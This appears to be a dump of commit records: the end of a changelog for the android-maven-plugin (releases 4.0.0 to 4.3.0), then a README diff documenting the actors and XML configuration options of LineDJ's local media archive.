https:\/\/github.com\/WonderCsabo\n\nPlanned changes:\n\n* migrate more tests to be instrumentation tests with example projects\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/452\n* anything else contributed by the community\n\n== 4.3.0 - released 2015-06-15 \n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/FB4mP5s1kvA\/EFxbrnnbca0J[Release Announcement Post]\n\n* Fixed processing of duplicate resources from dependencies\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/614\n** contributed by Marek Kedzierski https:\/\/github.com\/kedzie\n* Ability to choose the build tools version\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/637\n** Contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Added x86_64 and mips64 architectures to NDK support\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/634\n** Contributed by Marek Kedzierski http:\/\/kedzie.github.io\/\n* Migrated rest of the Google Code project content into site content\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n* Plugin updates\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n\n== 4.2.1 - released 2015-05-07\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/HOIC3b7MmoA\/Z8XUXpsmT-EJ[Release Announcement Post]\n\n* Refactored code base to com.simpligility to follow groupId\n** Contributed by Manfred Moser http:\/\/www.simpligility.com\n* Fixed NPE for undefined versionNamingPattern in ManifestMojo\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/622\n** Contributed by Leonid https:\/\/github.com\/greek1979\n* Fixed Error generating BuildConfig (ZipException: zip file is empty) if one of the dependent AARs has an empty classes.zip\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/626\n** Contributed by William Ferguson https:\/\/github.com\/william-ferguson-au\n* Updated Android SDK libraries 1.2.2 \/ 24.2.2\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Support for Junit4 Test Runner based tests\n** Usage requires deployment of Android SDK supplied Maven repositories to the\n local repository e.g. with Maven Android SDK Deployer\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/625\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/623\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/617\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n\n== 4.2.0 - released 2015-04-15\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/-HhJutxX0u8\/PAKA2dYDK2wJ[Release Announcement Post]\n\n* Include internal jars from aar libraries by default\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/586#issuecomment-74931486\n* Don't include internal libs from transitive AAR deps into an AAR\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/589\n** contributed by Philip Schiffer https:\/\/github.com\/hameno\n* Better doco for destinationAndroidManifest parameter\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/594\n** contributed by Matthias Stevens https:\/\/github.com\/mstevens83\n* Project META-INF artifacts are included in APK\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/602\n** Contributed by Marek Marek Kedzierski https:\/\/github.com\/kedzie\n* Support for specifying debug port - automatically forward JDWP connection\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/584\n** and follow up commits\n** contributed by Jaroslav Tulach https:\/\/github.com\/jtulach\n** and Manfred Moser http:\/\/www.simpligility.com\n* Configurable encoding for publish mojo listing files\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/603\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/601\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Checkstyle - removed deprecated check\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/609\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Add NDK support for arm64-v8a APP_ABI \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/574\n** contributed by https:\/\/github.com\/arnaud-soulard\n* Log warning about using dependencies conflicting with packaged libraries in android jar \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/610\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Allow AAR provided proguard configuration to be automatically integrated\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/612\n** contributed by Philip Schiffer https:\/\/github.com\/hameno\n* Updated Android SDK libraries 1.1.3 \/ 24.1.3\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/commit\/60ec75aa8ab889c7033fd403149973c0d3b66f82\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/commit\/869578d84af1f215bca341191bb0078899e3330c\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Regex support for VersionGenerator\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/605\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/606\n** contributed by Wang Xuerui https:\/\/github.com\/xen0n\n\n== 4.1.1 or higher - released 2015-02-02\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/EXYhXO1hbwM\/L2mS3Ho7-kQJ[Release Announcement Post]\n\n* Added Manifest Merger v2 example (tictactoe) & Deprecated merge manifest v1\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/560\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Added proguard support from library (AAR) projects\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/559\n** contributed by David Sobreira Marques https:\/\/github.com\/dpsm\n* Updated Takari lifecyle and integration testing setup to new releases\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/564\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n** and Igor Fedorenko https:\/\/github.com\/ifedorenko\n** sponsored by Takari http:\/\/takari.io\/\n* Fix to allow both release-plugin and IDEs to correctly consume AAR deps.\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/565\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n* Change default value for aidlSourceDirectory to src\/main\/aidl\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/555\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/557\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Documentation updates for the site rendering\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/567\n** and other commits\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Corrected unpackedLibsFolder default value\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/575\n** contributed by Pappy Stanescu https:\/\/github.com\/pa314159\n* Improvement of versionCode generator\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/570\n** contributed by Pappy Stanescu https:\/\/github.com\/pa314159\n\n== 4.1.0 - released 2015-01-08\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/oNm46DqGi2Q\/Gs3cQAQ018gJ[Release Announcement Post]\n\n* Updated to Android SDK libraries 1.0.0 \/ 24.0.0\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/531\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Use lint from Android SDK libraries rather than command line invocation\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/528\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/400\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/357\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/476\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Making unpacked-libs folder configurable\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/538\n** contributed by William Ferguson https:\/\/github.com\/william-ferguson-au\n* Added deprecation for APKLIB format\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/543\n* Use the Google Play Developer API to upload APKs and update the store listing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/534\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/418\n** contributed by Joris de Groot https:\/\/github.com\/jdegroot\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Improvements to project site including github ribbon and more\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/544\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Added Manifest Merger V2 and deprecated Manifest-Update mojo\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/539\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/519\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Refactor the 3 parameters used for the androidManifest.xml into 2 params \n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/542\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/508\n** contributed by Benoit Billington https:\/\/github.com\/Shusshu\n* Fixed broken undeploy mojo AndroidManifest parsing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/550\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* MultiDex improvement - generating mainDexClasses when multiDex flag set to true and mainDexList is null\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/526\n** contributed by Piotr Sor\u00f3bka https:\/\/github.com\/psorobka\n* A whole bunch minor project improvements and fixes\n** see commit history\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n\nATTENTION:\n\n* updatedManifestFile & sourceManifestFile parameters have been removed.\n* use androidManifestFile and destinationManifestFile\n** See https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/542\n\n\n== 4.0.0 - released 2014-11-25\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/9ogkKf0Xr7Y\/F9CKX6LV0uAJ[Release Announcement Post]\n\n* Migrated some documentation from the old Google Code site\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Fix for aar and jar dependency mix and related resolving\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/493\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/485\n** contributed by Hoyt Summers Pittman https:\/\/github.com\/secondsun\n* Fixes to proguard and multidex related processing\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/509\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/507\n** contributed by \u0141ukasz Suski https:\/\/github.com\/lsuski\n* Documentation for shading commons-codec to allow usage of newer version\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/498\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/487#issuecomment-60956025\n** contributed by Matthias Stevens https:\/\/github.com\/mstevens83\n* Custom exclude filter to ProGuardMojo\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/497\n** contributed by Csaba Koz\u00e1k https:\/\/github.com\/WonderCsabo\n* Fixes to resource files in sample projects to allow builds to pass with new SDK\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/514\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Always honor dexArguments parameters\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/517\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Downgraded runtime requirements to Maven 3.0.4\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Examples documentation\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Moved Emma analysis to process-classes phase\n** fixes https:\/\/github.com\/simpligility\/android-maven-plugin\/issues\/489\n** see https:\/\/github.com\/simpligility\/android-maven-plugin\/pull\/515\n** contributed by Dmitry Berezhnoy https:\/\/github.com\/deadmoto\n\n== 4.0.0-rc.3 - released 2014-10-28\n\nhttps:\/\/groups.google.com\/d\/msg\/maven-android-developers\/9ogkKf0Xr7Y\/F9CKX6LV0uAJ[Release Announcement Post]\n\n* Migrated complete project to new git repo at https:\/\/github.com\/simpligility\/android-maven-plugin\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n* Adapted codebase to new groupId \"com.simpligility.maven.plugins\n** contributed by Manfred Moser http:\/\/www.simpligility.com\n\n== 4.0.0-rc.2 and older release notes\n\nCan be found in link:changelog-old-3x.html[the migrated changelog] from the old project site.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"812899f7743e1b05eab3874d6cfec2cec02ab3dd","subject":"archiveLocalStartup: Updated documentation.","message":"archiveLocalStartup: Updated documentation.\n\nThere is no longer a complex configuration for the table of contents\nof local archives. Therefore, this section has been removed, and other\nparts have been adapted accordingly.\n","repos":"oheger\/LineDJ","old_file":"mediaArchive\/archiveLocalStartup\/README.adoc","new_file":"mediaArchive\/archiveLocalStartup\/README.adoc","new_contents":"= Local Media Archive Startup project\n\nThis module has the purpose to start the local media archive in an OSGi\nenvironment.\n\n== Description\n\nThis module is analogous to the startup project for the union archive, but\nit is responsible for the _local media archive_. The local media archive\nscans a folder structure with media files and passes the extracted meta data\nto a union archive which can either run on the same JVM or is accessed\nremotely.\n\nAccess to the union archive is obtained through the _client application\ncontext_ available to all LineDJ platform components: actor references for the\nactors implementing the archive are simply obtained from the _media facade_.\nThat way the location of the union archive is transparent.\n\nThe local archive is implemented by the following actors:\n\n.Actors implementing the local archive\n[cols=\"1,3\",options=\"header\"]\n|==============================\n| Actor class | Description\n| ArchiveGroupActor | An actor managing a group of local paths that need to be\nparsed for meta data files. For each path, the actor creates the other actors\nfor managing the media files. It is also responsible for the coordination of\nscan operations.\n| PersistentMetaDataManagerActor | The actor responsible for persistent meta\ndata files. It takes care that meta data extracted from media files is stored\non the local file system and is loaded again when the local archive restarts.\n| MetaDataManagerActor | Controls the extraction of meta data from single media\nfiles and sends the results to the union archive.\n| MediaManagerActor | Scans a specified folder structure for media files and\ncollects information about media available. This information is sent to the\nunion archive.\n|==============================\n\n== Configuration\n\nThe configuration of the local media archive is also read from the\nconfiguration file of the LineDJ management application (analogous as the\nconfiguration for the union media archive; if both components are deployed in\nthe same platform container, they actually use the same configuration file,\nand also their configuration sections overlap). The settings are placed in a\nsection named _media_. Below is an example fragment with all supported\nconfiguration options:\n\n[source,xml]\n----\n<configuration>\n <media>\n <mediaArchive>\n <metaDataUpdateChunkSize>32<\/metaDataUpdateChunkSize>\n <metaDataMaxMessageSize>128<\/metaDataMaxMessageSize>\n <\/mediaArchive>\n <localArchives>\n <processorCount>1<\/processorCount>\n <readerTimeout>3600<\/readerTimeout>\n <readerCheckInterval>600<\/readerCheckInterval>\n <readerCheckInitialDelay>480<\/readerCheckInitialDelay>\n <downloadChunkSize>16384<\/downloadChunkSize>\n <infoSizeLimit>32768<\/infoSizeLimit>\n <includedExtensions>MP3<\/includedExtensions>\n <scan>\n <parseInfoTimeout>10<\/parseInfoTimeout>\n <mediaBufferSize>3<\/mediaBufferSize>\n <\/scan>\n <metaDataExtraction>\n <readChunkSize>32768<\/readChunkSize>\n <tagSizeLimit>4096<\/tagSizeLimit>\n <metaDataUpdateChunkSize>8<\/metaDataUpdateChunkSize>\n <metaDataMaxMessageSize>160<\/metaDataMaxMessageSize>\n <processingTimeout>60<\/processingTimeout>\n <\/metaDataExtraction>\n <metaDataPersistence>\n <chunkSize>4096<\/chunkSize>\n <parallelCount>2<\/parallelCount>\n <writeBlockSize>40<\/writeBlockSize>\n <\/metaDataPersistence>\n <localArchive>\n <rootPath>\/data\/music\/archive\/1and1\/media<\/rootPath>\n <archiveName>1and1-${host}<\/archiveName>\n <metaDataPersistence>\n <path>\/data\/music\/archive\/1and1\/metadata<\/path>\n <tocFile>\/data\/music\/archive\/1and1\/content.json<\/tocFile>\n <\/metaDataPersistence>\n <\/localArchive>\n <localArchive>\n <rootPath>\/data\/music\/archive\/magenta1\/media<\/rootPath>\n <archiveName>magenta1-${host}<\/archiveName>\n <metaDataPersistence>\n <path>\/data\/music\/archive\/magenta1\/metadata<\/path>\n <tocFile>\/data\/music\/archive\/magenta1\/content.json<\/tocFile>\n <\/metaDataPersistence>\n <\/localArchive>\n <\/localArchives>\n <\/media>\n<\/configuration>\n----\n\nInformation about local archives is located in a section named `localArchives`.\nThe section can contain a bunch of properties that define default settings\nvalid for all archives. Concrete archives are then defined by `localArchive`\nelements within this section. In the definition of a local archive the same\nproperties can be used as in the `localArchives` section. Here an override\nmechanism is in place: Properties that are not defined for a concrete archive\nuse the value set by the top-level section; and properties set for a local\narchive override the values from the top-level section. Using this schema, it\nis typically possible to define most of the default settings once in the\n`localArchives` section, while concrete archive declarations can be kept to a\nminimum (e.g. setting specific paths only).\n\nEach local archive listed in the configuration can be given a descriptive name\nusing the _archiveName_ property. The name can be displayed by applications\nallowing to browse archives. The archive name can contain a variable named\n`${host}`, which is replaced by the IP-address of the local machine. This can\nbe useful if the content is exposed via a remote union archive.\n\nThe options available can be grouped into different categories and are\ndescribed in the following subsections. It does not matter whether an option is\ndefined as a default or for a specific local archive.\n\n=== Location of media files\n\nA number of options define where - on the local hard disk - media files can be\nfound:\n\n.Configuration options for the location of media files\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| excludedExtensions | With this list property (elements can be repeated as\noften as necessary) the extensions of files can be specified which should be\nignored when scanning for media files. Such files are not included in media.\n| includedExtensions | As an alternative to _excludedProperties_, with this\nproperty a set of files extensions can be specified that are included; files\nwith other extensions are ignored. If both file extensions to include and to\nexclude are specified, inclusions take precedence.\n| infoSizeLimit | Files with information about a medium (typically called\n`playlist.settings`) are fully read and processed in-memory. To avoid\nunrestricted memory consumption, with this property a maximum file size (in\nbytes) can be specified. Info files which are larger will not be processed.\n| rootPath | This property defines the folder to be scanned for media files.\n| processorCount | Defines the number of reader actors processing this folder\nstructure in parallel. If multiple archives are defined, the single archives\nare processed one by one with this number of reader actors; so this property\ndefines the total number of parallel file reads.\n| metaDataMediaBufferSize | A property determining the maximum size of the\nbuffer for media waiting to be processed for meta data extraction. During a\nmeta data scan operation, in a first step the content of media is determined.\nThen the meta data for the files on the media is obtained (either from a\npersistent storage or by meta data extraction). As this may take more time, the\nnumber of media waiting to be processed for meta data extraction may increase.\nThis property defines a threshold for this number. When it is reached the scan\noperation is blocked until media have been processed completely. This reduces\nthe amount of memory consumption during a scan operation. The property is\noptional; a default value is used if it is not specified.\n|============================\n\n=== Settings related to scans for media files\n\nThese settings control the process of scanning a directory structure for media\nfiles. Here the file system is traversed, media files are assigned to media\n(identified by _medium description files_ with the file extension _.settings_),\nand the description files are parsed to extract meta data about these media.\nThe settings are placed in a section named _scan_.\n\n.Configuration options that control the scan process\n[cols=\"1,3,1\",options=\"header\"]\n|==============================\n| Setting | Description | Default\n| parseInfoTimeout | A timeout (in seconds) for parsing a medium description\nfile. If a parse operation takes longer than this time span, it is aborted and\ndummy meta data is used for this medium. | 60 seconds\n| mediaBufferSize | The size of the buffer for media to be processed in\nparallel. When scanning a directory structure for media files some temporary\ndata is created for assignments of files to media, parsed description files,\netc. This property defines the number of temporary artifacts of those types\nthat can exist. If this limit is reached, stream processing pauses until the\nlimiting temporary artifacts have been processed. | 8\n|==============================\n\n=== Meta data extraction\n\nThe archive parses all detected media files in order to extract meta data\n(e.g. ID3 tags) from them. With this group of options the behavior of this\nmeta data extraction process can be specified. The options are grouped in a\nsub section named _metaDataExtraction_:\n\n.Configuration options for meta data extraction\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| metaDataExtraction.readChunkSize | Block size to be used when reading media\nfiles. A buffer of this size is created in memory.\n| metaDataExtraction.tagSizeLimit | Defines a maximum size of an ID3 tag to be\nprocessed. Tags can become large, e.g. when they contain an image. The archive\nonly extracts text-based meta data. If a tag length is greater than this value,\nit is ignored.\n| metaDataExtraction.processingTimeout | Here a timeout (in seconds) for the\nprocessing of a single media file can be specified. If meta data extraction for\nthis file takes longer, processing is aborted, and the file is ignored.\n|============================\n\n=== Meta data persistence\n\nOnce extracted, meta data is stored in files in JSON format on the local file\nsystem. How this is done is specified with another group of options in the\n_metaDataPersistence_ sub section:\n\n.Configuration options for persisting meta data\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| metaDataPersistence.path | Defines a path (on the local file system) where\nfiles with extracted meta data information can be stored. Here files with the\nextension `.mdt` (for meta data) are created containing the ID3 information\nextracted from media files. These files are loaded when the archive starts up,\nso that media files do not have to be scanned again.\n| metaDataPersistence.chunkSize | Specifies the block size to be used when\nreading or writing meta data files.\n| metaDataPersistence.parallelCount | Here a number can be specified how many\nmeta data files are read in parallel. Increasing the number can speedup startup\ntime of the archive (provided that the local disc can handle the load).\n| metaDataPersistence.writeBlockSize | If no persistent meta data file for a\nmedium is available, a new one is created automatically when the media files\nfrom the medium are scanned. After some media files have been processed, an\n`.mdt` file is written out, so that the information is already persisted in\ncase the scan is aborted. The _writeBlockSize_ property defines the number of\nmedia files to be processed after the currently collected meta data is\npersisted.\n| metaDataPersistence.tocFile | A local archive can be configured to generate a\nJSON file with a table of contents, i.e. a list with all media it contains and\ntheir corresponding meta data files. This file has the same format as used by\nan _HTTP archive_ to define its content. With the _tocFile_ property, the path\nwhere to store the table of contents file can be specified. If it is missing,\nno such file is generated.\n|============================\n","old_contents":"= Local Media Archive Startup project\n\nThis module has the purpose to start the local media archive in an OSGi\nenvironment.\n\n== Description\n\nThis module is analogous to the startup project for the union archive, but\nit is responsible for the _local media archive_. The local media archive\nscans a folder structure with media files and passes the extracted meta data\nto a union archive which can either run on the same JVM or is accessed\nremotely.\n\nAccess to the union archive is obtained through the _client application\ncontext_ available to all LineDJ platform components: actor references for the\nactors implementing the archive are simply obtained from the _media facade_.\nThat way the location of the union archive is transparent.\n\nThe local archive is implemented by the following actors:\n\n.Actors implementing the local archive\n[cols=\"1,3\",options=\"header\"]\n|==============================\n| Actor class | Description\n| ArchiveGroupActor | An actor managing a group of local paths that need to be\nparsed for meta data files. For each path, the actor creates the other actors\nfor managing the media files. It is also responsible for the coordination of\nscan operations.\n| PersistentMetaDataManagerActor | The actor responsible for persistent meta\ndata files. It takes care that meta data extracted from media files is stored\non the local file system and is loaded again when the local archive restarts.\n| MetaDataManagerActor | Controls the extraction of meta data from single media\nfiles and sends the results to the union archive.\n| MediaManagerActor | Scans a specified folder structure for media files and\ncollects information about media available. This information is sent to the\nunion archive.\n|==============================\n\n== Configuration\n\nThe configuration of the local media archive is also read from the\nconfiguration file of the LineDJ management application (analogous as the\nconfiguration for the union media archive; if both components are deployed in\nthe same platform container, they actually use the same configuration file,\nand also their configuration sections overlap). The settings are placed in a\nsection named _media_. Below is an example fragment with all supported\nconfiguration options:\n\n[source,xml]\n----\n<configuration>\n <media>\n <mediaArchive>\n <metaDataUpdateChunkSize>32<\/metaDataUpdateChunkSize>\n <metaDataMaxMessageSize>128<\/metaDataMaxMessageSize>\n <\/mediaArchive>\n <localArchives>\n <processorCount>1<\/processorCount>\n <readerTimeout>3600<\/readerTimeout>\n <readerCheckInterval>600<\/readerCheckInterval>\n <readerCheckInitialDelay>480<\/readerCheckInitialDelay>\n <downloadChunkSize>16384<\/downloadChunkSize>\n <infoSizeLimit>32768<\/infoSizeLimit>\n <includedExtensions>MP3<\/includedExtensions>\n <scan>\n <parseInfoTimeout>10<\/parseInfoTimeout>\n <mediaBufferSize>3<\/mediaBufferSize>\n <\/scan>\n <metaDataExtraction>\n <readChunkSize>32768<\/readChunkSize>\n <tagSizeLimit>4096<\/tagSizeLimit>\n <metaDataUpdateChunkSize>8<\/metaDataUpdateChunkSize>\n <metaDataMaxMessageSize>160<\/metaDataMaxMessageSize>\n <processingTimeout>60<\/processingTimeout>\n <\/metaDataExtraction>\n <metaDataPersistence>\n <chunkSize>4096<\/chunkSize>\n <parallelCount>2<\/parallelCount>\n <writeBlockSize>40<\/writeBlockSize>\n <\/metaDataPersistence>\n <toc>\n <descRemovePrefix>\/data\/music\/archive\/media<\/descRemovePrefix>\n <descPathSeparator>\/<\/descPathSeparator>\n <descUrlEncoding>true<\/descUrlEncoding>\n <rootPrefix>\/music\/archive\/media<\/rootPrefix>\n <metaDataPrefix>\/music\/archive\/metadata\/<\/metaDataPrefix>\n <\/toc>\n <localArchive>\n <rootPath>\/data\/music\/archive\/1and1\/media<\/rootPath>\n <archiveName>1and1-${host}<\/archiveName>\n <metaDataPersistence>\n <path>\/data\/music\/archive\/1and1\/metadata<\/path>\n <\/metaDataPersistence>\n <toc>\n <file>\/data\/music\/archive\/1and1\/content.json<\/file>\n <descRemovePrefix>\/data\/music\/archive\/1and1\/media<\/descRemovePrefix>\n <\/toc>\n <\/localArchive>\n <localArchive>\n <rootPath>\/data\/music\/archive\/magenta1\/media<\/rootPath>\n <archiveName>magenta1-${host}<\/archiveName>\n <metaDataPersistence>\n <path>\/data\/music\/archive\/magenta1\/metadata<\/path>\n <\/metaDataPersistence>\n <toc>\n <file>\/data\/music\/archive\/magenta1\/content.json<\/file>\n <descRemovePrefix>\/data\/music\/archive\/magenta1\/media<\/descRemovePrefix>\n <\/toc>\n <\/localArchive>\n <\/localArchives>\n <\/media>\n<\/configuration>\n----\n\nInformation about local archives is located in a section named `localArchives`.\nThe section can contain a bunch of properties that define default settings\nvalid for all archives. Concrete archives are then defined by `localArchive`\nelements within this section. In the definition of a local archive the same\nproperties can be used as in the `localArchives` section. Here an override\nmechanism is in place: Properties that are not defined for a concrete archive\nuse the value set by the top-level section; and properties set for a local\narchive override the values from the top-level section. Using this schema, it\nis typically possible to define most of the default settings once in the\n`localArchives` section, while concrete archive declarations can be kept to a\nminimum (e.g. setting specific paths only).\n\nEach local archive listed in the configuration can be given a descriptive name\nusing the _archiveName_ property. The name can be displayed by applications\nallowing to browse archives. The archive name can contain a variable named\n`${host}`, which is replaced by the IP-address of the local machine. This can\nbe useful if the content is exposed via a remote union archive.\n\nThe options available can be grouped into different categories and are\ndescribed in the following subsections. It does not matter whether an option is\ndefined as a default or for a specific local archive.\n\n=== Location of media files\n\nA number of options define where - on the local hard disk - media files can be\nfound:\n\n.Configuration options for the location of media files\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| excludedExtensions | With this list property (elements can be repeated as\noften as necessary) the extensions of files can be specified which should be\nignored when scanning for media files. Such files are not included in media.\n| includedExtensions | As an alternative to _excludedProperties_, with this\nproperty a set of files extensions can be specified that are included; files\nwith other extensions are ignored. If both file extensions to include and to\nexclude are specified, inclusions take precedence.\n| infoSizeLimit | Files with information about a medium (typically called\n`playlist.settings`) are fully read and processed in-memory. To avoid\nunrestricted memory consumption, with this property a maximum file size (in\nbytes) can be specified. Info files which are larger will not be processed.\n| rootPath | This property defines the folder to be scanned for media files.\n| processorCount | Defines the number of reader actors processing this folder\nstructure in parallel. If multiple archives are defined, the single archives\nare processed one by one with this number of reader actors; so this property\ndefines the total number of parallel file reads.\n| metaDataMediaBufferSize | A property determining the maximum size of the\nbuffer for media waiting to be processed for meta data extraction. During a\nmeta data scan operation, in a first step the content of media is determined.\nThen the meta data for the files on the media is obtained (either from a\npersistent storage or by meta data extraction). As this may take more time, the\nnumber of media waiting to be processed for meta data extraction may increase.\nThis property defines a threshold for this number. When it is reached the scan\noperation is blocked until media have been processed completely. This reduces\nthe amount of memory consumption during a scan operation. The property is\noptional; a default value is used if it is not specified.\n|============================\n\n=== Settings related to scans for media files\n\nThese settings control the process of scanning a directory structure for media\nfiles. Here the file system is traversed, media files are assigned to media\n(identified by _medium description files_ with the file extension _.settings_),\nand the description files are parsed to extract meta data about these media.\nThe settings are placed in a section named _scan_.\n\n.Configuration options that control the scan process\n[cols=\"1,3,1\",options=\"header\"]\n|==============================\n| Setting | Description | Default\n| parseInfoTimeout | A timeout (in seconds) for parsing a medium description\nfile. If a parse operation takes longer than this time span, it is aborted and\ndummy meta data is used for this medium. | 60 seconds\n| mediaBufferSize | The size of the buffer for media to be processed in\nparallel. When scanning a directory structure for media files some temporary\ndata is created for assignments of files to media, parsed description files,\netc. This property defines the number of temporary artifacts of those types\nthat can exist. If this limit is reached, stream processing pauses until the\nlimiting temporary artifacts have been processed. | 8\n|==============================\n\n=== Meta data extraction\n\nThe archive parses all detected media files in order to extract meta data\n(e.g. ID3 tags) from them. With this group of options the behavior of this\nmeta data extraction process can be specified. The options are grouped in a\nsub section named _metaDataExtraction_:\n\n.Configuration options for meta data extraction\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| metaDataExtraction.readChunkSize | Block size to be used when reading media\nfiles. A buffer of this size is created in memory.\n| metaDataExtraction.tagSizeLimit | Defines a maximum size of an ID3 tag to be\nprocessed. Tags can become large, e.g. when they contain an image. The archive\nonly extracts text-based meta data. If a tag length is greater than this value,\nit is ignored.\n| metaDataExtraction.processingTimeout | Here a timeout (in seconds) for the\nprocessing of a single media file can be specified. If meta data extraction for\nthis file takes longer, processing is aborted, and the file is ignored.\n|============================\n\n=== Meta data persistence\n\nOnce extracted, meta data is stored in files in JSON format on the local file\nsystem. How this is done is specified with another group of options in the\n_metaDataPersistence_ sub section:\n\n.Configuration options for persisting meta data\n[cols=\"1,3\",options=\"header\"]\n|============================\n| Setting | Description\n| metaDataPersistence.path | Defines a path (on the local file system) where\nfiles with extracted meta data information can be stored. Here files with the\nextension `.mdt` (for meta data) are created containing the ID3 information\nextracted from media files. These files are loaded when the archive starts up,\nso that media files do not have to be scanned again.\n| metaDataPersistence.chunkSize | Specifies the block size to be used when\nreading or writing meta data files.\n| metaDataPersistence.parallelCount | Here a number can be specified how many\nmeta data files are read in parallel. Increasing the number can speedup startup\ntime of the archive (provided that the local disc can handle the load).\n| metaDataPersistence.writeBlockSize | If no persistent meta data file for a\nmedium is available, a new one is created automatically when the media files\nfrom the medium are scanned. After some media files have been processed, an\n`.mdt` file is written out, so that the information is already 